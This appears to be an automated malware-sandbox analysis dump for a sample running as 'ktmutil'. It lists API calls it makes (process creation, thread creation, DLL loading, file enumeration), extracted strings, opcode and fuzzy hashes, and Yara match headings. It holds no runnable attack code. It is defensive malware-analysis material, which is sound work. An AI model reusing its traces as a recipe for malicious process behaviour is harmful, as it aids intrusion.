                                                • Sleep.KERNELBASE(000007D0), ref: 001A2E0B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 16c646962bfcac6c7e89313578ae33a01af71f2846a09960e3df77adc4b1dbb0
                                                • Instruction ID: 669e0fa06b45b6006e58949c2bc6e48ebb59791e48627a16ee56847e4ccc94db
                                                • Opcode Fuzzy Hash: 16c646962bfcac6c7e89313578ae33a01af71f2846a09960e3df77adc4b1dbb0
                                                • Instruction Fuzzy Hash: F3319CB5644704BBD728DF64C885FE7BBA8EB49300F00862DFA1D9B241D770BA44CBA0
                                                APIs
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0019C1FF
                                                • FindClose.KERNELBASE(?), ref: 0019C20A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFileNext
                                                • String ID:
                                                • API String ID: 2066263336-0
                                                • Opcode ID: 61251cbbbc3701fce700209c83bf5d1be23c19b9e477b48159037cbaa2cfceb0
                                                • Instruction ID: 33c4d5b28636734f48ebf6f4cce60c5eb80bdd92a9efe8b85f55620c986b57d5
                                                • Opcode Fuzzy Hash: 61251cbbbc3701fce700209c83bf5d1be23c19b9e477b48159037cbaa2cfceb0
                                                • Instruction Fuzzy Hash: 25212D76614A0AEFCF02EBB4DC421DABB68FB11701B4445A8E080CB502E323C506C7D9
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0019EE37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 0d238c03cef40c90e93fcdfdfef43d6e1f248c200ff2362306076e114f7839d0
                                                • Instruction ID: b5dfeafacc5fbf4db07f84707c48061cfc54ee3e582d2eaeacc979f62354cb06
                                                • Opcode Fuzzy Hash: 0d238c03cef40c90e93fcdfdfef43d6e1f248c200ff2362306076e114f7839d0
                                                • Instruction Fuzzy Hash: 84312CB6A0060AAFDF00DFD8C8809EFB7B9BF88304B108559E505EB214D775EE45CBA1
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00194792
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction ID: d91c5a5bb758a041ccd204d4c11f503380b0f7c05d3d6a3f8f32ff0dfec2c675
                                                • Opcode Fuzzy Hash: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction Fuzzy Hash: 74011EB9D1020DBBDF14DAE4DC42F9EB7B89B55308F004195E90897241F731EB55CB91
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00197FF3,00000010,?,?,?,00000044,?,00000010,00197FF3,?,?,?), ref: 001A85D3
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 41b7be0dd796f19bbba987c49d4c405ccc6914538a4c3070e92ac44fadb2ab97
                                                • Instruction ID: 4e19df765a16142c466df5f52ca1c31030b6da694061440b768fe46eec5edf96
                                                • Opcode Fuzzy Hash: 41b7be0dd796f19bbba987c49d4c405ccc6914538a4c3070e92ac44fadb2ab97
                                                • Instruction Fuzzy Hash: 7A01C0B2204208BFCB04DE89DC81EEB77ADAF8C714F018208BA09E3241D630F8518BA4
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00189765
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: db68cea5b33e48a9887a118ab88ffa2fc65f0fa28a0012da5220b9cfbcd1890c
                                                • Instruction ID: a37e90fbd50c7f2a906ae6cda80279cb3bba11aed6880ff05200c5cc6f64bcfc
                                                • Opcode Fuzzy Hash: db68cea5b33e48a9887a118ab88ffa2fc65f0fa28a0012da5220b9cfbcd1890c
                                                • Instruction Fuzzy Hash: 52F0653738060476D33075A99C02FE7768CDB95B61F14042AF60DEB1C1DA91B54147E4
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00189765
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 6a1261c709bf769503d9941d8cc08363526acfdca6d5da9d256424ecf686ffd6
                                                • Instruction ID: 19e78c035fde1b2bf09ae58a9ea49c972261b0bc43244c75ae1a3f1d13bf4070
                                                • Opcode Fuzzy Hash: 6a1261c709bf769503d9941d8cc08363526acfdca6d5da9d256424ecf686ffd6
                                                • Instruction Fuzzy Hash: A8F06D7628070476D23076A98C02FE7768C9B95B91F140429FA09EB2C2DA96B9414BE8
                                                APIs
                                                • RtlAllocateHeap.NTDLL(001934CE,00000000,001934CE,?,00000000,001934CE,00000000,001934CE,?,001A103C), ref: 001A84CC
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction ID: 40febb414caa7bc0764eaa7b0500908d662d37de9dcf33dd4ea18ecd0327b81a
                                                • Opcode Fuzzy Hash: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction Fuzzy Hash: 0CE065B2200204BBD610EF99EC41FDB37ACEFC9710F008019F908A7242DB70BA118BB4
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9DBC03FC,00000007,00000000,00000004,00000000,00193FFE,000000F4,?,?,?,?,?), ref: 001A851C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction ID: 4be5285a64d8498d8b743956ab94a67b71def68a8f03a976eaf6297f39474ee3
                                                • Opcode Fuzzy Hash: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction Fuzzy Hash: 91E0E5B6200608BBDA14EE99DC85FDB77ACEFC9724F004419F909A7242D770B9518BB5
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0019805C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 0d38490eea973d5cebe6d2d7c07c676d77f8ac72a32eaa9a95ea0a4ea9c6e7fd
                                                • Instruction ID: 8c7ba46c351322aec55be35af1e7f0e78fb65a182b489a281e0691323ef978d6
                                                • Opcode Fuzzy Hash: 0d38490eea973d5cebe6d2d7c07c676d77f8ac72a32eaa9a95ea0a4ea9c6e7fd
                                                • Instruction Fuzzy Hash: 3EE048751403046AEB2465689C45B7637585749B28F2C4660B95C9B1C1EA75F9014554
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00191C50,001A6F87,001A4867,?), ref: 00197E73
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 62b5edb83e67690a41ff4d8456c1f6fa38c588b013ce707ce9f25535b620a960
                                                • Instruction ID: dfb89dd5d3045f4052e3d7192d5ebb9c5d6abad53622535f069b98ccb4a8a5b9
                                                • Opcode Fuzzy Hash: 62b5edb83e67690a41ff4d8456c1f6fa38c588b013ce707ce9f25535b620a960
                                                • Instruction Fuzzy Hash: 90D05E766803057BFA10B6F48C03F2A328CAB14754F044464B908E72C3EE59F5014AA9
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f3196598f3171fd671bedd456c93c79c411c33db585715228005f9544055dc11
                                                • Instruction ID: abdcaf56e016b55f07d55b00be20eb5c542de5eeb482da1004a46bab4b6eb2f2
                                                • Opcode Fuzzy Hash: f3196598f3171fd671bedd456c93c79c411c33db585715228005f9544055dc11
                                                • Instruction Fuzzy Hash: 7DB09B72D055C5D5DE11E7604A087177910A7D0701F15C0B1D2130692F4738D1D1E175
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588700512.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2a10000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63dc725e25436956f5d6451f19ded2231a0730a892001d4122b14db1ee574c6f
                                                • Instruction ID: 153272cfe87938ce4cd0f58091862c17e1b708c9029f3b6dca330009950eab6b
                                                • Opcode Fuzzy Hash: 63dc725e25436956f5d6451f19ded2231a0730a892001d4122b14db1ee574c6f
                                                • Instruction Fuzzy Hash: AA41E67165CB1D4FD368AF699081676B2E2FB85320F10462EDD9AC3252EF70D4468785
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588700512.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2a10000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3558027158
                                                • Opcode ID: c406cc19488b8a67e3990893c1588120ade60211e3e9fb244e2a84437ef2cc18
                                                • Instruction ID: 9d9dbe06ffb7c996b59b4efcb03ed1a45cf27a1498324cc5e74f87c4262af5f0
                                                • Opcode Fuzzy Hash: c406cc19488b8a67e3990893c1588120ade60211e3e9fb244e2a84437ef2cc18
                                                • Instruction Fuzzy Hash: 499150F04082988AC7158F55A0612AFFFB1EBC6305F15856DE7E6BB243C3BE8905CB95
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: f77b07517ef7ae92724c436f1a09ebd912739e65a261ab014d07314df71b541f
                                                • Instruction ID: 4d7125aa9735e19ee14d9f6b5654263e9e63e0bb7fdfb5bc905466a00a337629
                                                • Opcode Fuzzy Hash: f77b07517ef7ae92724c436f1a09ebd912739e65a261ab014d07314df71b541f
                                                • Instruction Fuzzy Hash: CB5184B6E0411A7FDF20DF688890A7EF7B8FB08204B5485B9E995D7641D734EA448BA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 4ca82ff2caa127024529d4fa4afda487167976bf5deb2c6011431c3f614ee9f6
                                                • Instruction ID: bcdc6ca3ab612442a122cb76b987891a6a3ba8bc6c75bb70bb07825fd47b540f
                                                • Opcode Fuzzy Hash: 4ca82ff2caa127024529d4fa4afda487167976bf5deb2c6011431c3f614ee9f6
                                                • Instruction Fuzzy Hash: AD51F771A00645AEDF30DF9CC8E497FB7F9EB84204B14849AE896D7681DB74EA40CB61
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02BC4742
                                                • ExecuteOptions, xrefs: 02BC46A0
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02BC4725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02BC46FC
                                                • Execute=1, xrefs: 02BC4713
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02BC4787
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02BC4655
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 9256f7837925279f1b780b807a13f9072fd58da5ce6601fdb7bfd3f6c567c1ef
                                                • Instruction ID: 2f1c3b949746e83ebd4b97a33a3a353864a92892dd99ac6be2229df633eac059
                                                • Opcode Fuzzy Hash: 9256f7837925279f1b780b807a13f9072fd58da5ce6601fdb7bfd3f6c567c1ef
                                                • Instruction Fuzzy Hash: F1512939A402196BEF11BBA4DC95FAAB7B9EF04308F2400E9E50DA7190EF709A45DF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588700512.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2a10000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C_ZP$GVKG$GZ\]$RCC_$REZU$RGZ\$R]TV$VKP[$ZPRG$Z^RT$_ZPR
                                                • API String ID: 0-4216276281
                                                • Opcode ID: b359dc9139f1e1141bfc5e491422198491be49e9c1df6680fd5360b8984502ba
                                                • Instruction ID: 25ab94083820e55f4a1ea9ca3b200b74006c1eb06d77cb7eadda6e8b6508c2ed
                                                • Opcode Fuzzy Hash: b359dc9139f1e1141bfc5e491422198491be49e9c1df6680fd5360b8984502ba
                                                • Instruction Fuzzy Hash: 523125B095438CEFCB119F80D5846DDBBB1FB0470AF8140A9EA6A6F241C771865ACF89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: f5ab70365204f68532e854cec8014476d50b38977c048912124bcda453cb4c94
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 28819070E052499FDF24CF68E8917FEBBB2EF45318F1882A9D861A7291C735A840CB51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: e37e684d164639ca9333ac988df2661110b49524b8374afb9e24888c8ce5b4ac
                                                • Instruction ID: 82cc76f32e4085f7951b336ea53a5a9cccb35290e3288f67dfbe18b8d0012de7
                                                • Opcode Fuzzy Hash: e37e684d164639ca9333ac988df2661110b49524b8374afb9e24888c8ce5b4ac
                                                • Instruction Fuzzy Hash: 69215176E00119ABDB10DF79CC84AAEBBF9AF84744F040166ED45E3240EB30DE019BA1
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02BC02E7
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02BC02BD
                                                • RTL: Re-Waiting, xrefs: 02BC031E
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 2142ab169abd558bf61001a2b23e01dd80fa0c7c1fa0bb99882edf2e010ffeff
                                                • Instruction ID: 19eb94a6dcfaad5961a50b34853ec9bea11cf639650b279bb5845003010ced9c
                                                • Opcode Fuzzy Hash: 2142ab169abd558bf61001a2b23e01dd80fa0c7c1fa0bb99882edf2e010ffeff
                                                • Instruction Fuzzy Hash: 39E1BC30608741DFD725DF28C884B2AB7E1FB88318F244AADF5A58B6E0D774D944CB46
                                                Strings
                                                • RTL: Resource at %p, xrefs: 02BC7B8E
                                                • RTL: Re-Waiting, xrefs: 02BC7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02BC7B7F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: bf31d81933c4d23e9084c5361ca5782c428fd9c500a5f956c6e115762ec5fd40
                                                • Instruction ID: 9e0ba21b1eeb5770bdfdbc8e2fc1b2d68a352b2c43e4cded94b33048e372c342
                                                • Opcode Fuzzy Hash: bf31d81933c4d23e9084c5361ca5782c428fd9c500a5f956c6e115762ec5fd40
                                                • Instruction Fuzzy Hash: 7E41E1357047029FDB21EE25C850B6AB7E5EF88714F100AADF99ADB690DB30E805CF91
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02BC728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 02BC72A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02BC7294
                                                • RTL: Re-Waiting, xrefs: 02BC72C1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 40b73c37ae9c2bb42a6c7de6fbed43791124d711f5e46fbf8c0dafeaa466ad8b
                                                • Instruction ID: 479e95e56029d35255fc5371073500c1403dd58b67080d32adde5a8fdac60cef
                                                • Opcode Fuzzy Hash: 40b73c37ae9c2bb42a6c7de6fbed43791124d711f5e46fbf8c0dafeaa466ad8b
                                                • Instruction Fuzzy Hash: 6E411031700206ABDB20DE25CC41B66B7A9FB55714F28069DF999EB240DB20E846DBD1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: c3c4d0b936f314d813abbf98ae167039ac3911a76ca856ea15cb9a7b0fa5db59
                                                • Instruction ID: 2866b5c6c81f60cdf082326ec2b5c9e78b8850ba862b7e1145061c785756d955
                                                • Opcode Fuzzy Hash: c3c4d0b936f314d813abbf98ae167039ac3911a76ca856ea15cb9a7b0fa5db59
                                                • Instruction Fuzzy Hash: 37318772A001199FDB20DF29CC94BEEB7FCEB44614F544596ED4DD3140EB30AA449F61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: 687116d5ea85b70112f6ed03c2b31388e8ae502e85f30a92bdd6919850b4c199
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 099193F0E102459BDF24DE69C881BBEF7E9EF45724F2446BAE855AB2C0DB309940DB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
